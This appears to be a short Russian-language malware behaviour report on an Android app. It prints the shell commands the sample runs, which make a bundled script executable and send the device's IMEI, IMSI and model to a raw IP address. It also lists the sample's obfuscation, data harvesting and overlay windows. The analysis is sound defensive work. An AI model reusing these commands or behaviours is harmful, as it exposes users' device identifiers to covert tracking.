Запускает следующие shell-скрипты:
- <Package Folder>/app_lib/unobs <Package> http://112.124.45.224/uninstall/?site=malbum&device_id=<IMEI>905dfdda33c8kkapp&version=3.3&imsi=<IMSI>&channel=android&model=<System Property>&free_mem=804929536&total_mem=1055907840&language=en_US 0
- chmod 775 <Package Folder>/app_lib/unobs
- sh <Package Folder>/app_lib/unobs <Package> http://112.124.45.224/uninstall/?site=malbum&device_id=<IMEI>905dfdda33c8kkapp&version=3.3&imsi=<IMSI>&channel=android&model=<System Property>&free_mem=804929536&total_mem=1055907840&language=en_US 0
Загружает динамические библиотеки:
Использует следующие алгоритмы для шифрования данных:
Использует следующие алгоритмы для расшифровки данных:
Использует специальную библиотеку для скрытия исполняемого байт-кода.
Получает информацию о сети.
Получает информацию о телефоне (номер, IMEI и т. д.).
Получает информацию о запущенных приложениях.
Отрисовывает собственные окна поверх других приложений.